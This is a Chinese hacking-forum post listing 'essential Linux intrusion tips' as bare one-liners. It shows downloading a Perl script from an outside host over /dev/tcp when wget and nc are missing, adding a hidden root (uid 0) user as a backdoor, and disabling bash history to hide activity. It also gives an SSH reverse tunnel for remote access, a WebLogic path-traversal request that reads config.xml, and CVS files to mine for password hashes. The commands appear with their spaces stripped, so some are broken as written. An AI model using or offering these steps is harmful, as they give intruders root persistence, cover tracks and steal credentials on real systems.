linux入侵必备的技巧

301 |

0 | 2012-4-1 19:16:38 | 显示全部楼层 |阅读模式

1.无wgetnc等下载工具时下载文件

exec5<>/dev/tcp/yese.yi.org/80&&echo-e"GET/c.plHTTP/1.0\n">&5&&cat<&5>c.pl
 
2.Linux添加uid为0的用户

useradd-o-u0cnbird
 
3.bash去掉history记录

exportHISTSIZE=0

exportHISTFILE=/dev/null
 
4.SSH反向链接

ssh-C-f-N-g-R44:127.0.0.1:22cnbird@ip-p指定远端服务器SSH端口

然后服务器上执行sshlocalhost-p44即可
 
5.weblogic本地读取文件漏洞

curl-H"wl_request_type:wl_xml_entity_request"-H"xml-registryname:../../"-H"xml-entity-path:config.xml"http://server/wl_management_internal2/wl_management
 
6.apache查看虚拟web目录

./httpd-t-DDUMP_VHOSTS
 
7.cvs渗透技巧

CVSROOT/passwdUNIXSHA1的密码文件

CVSROOT/readers

CVSROOT/writers

CVS/Root

CVS/Entries更新的文件和目录内容

CVS/Repository

*

发帖前要善用【论坛搜索】功能，那里可能会有你要找的答案或者已经有人发布过相同内容了，请勿重复发帖。

使用道具举报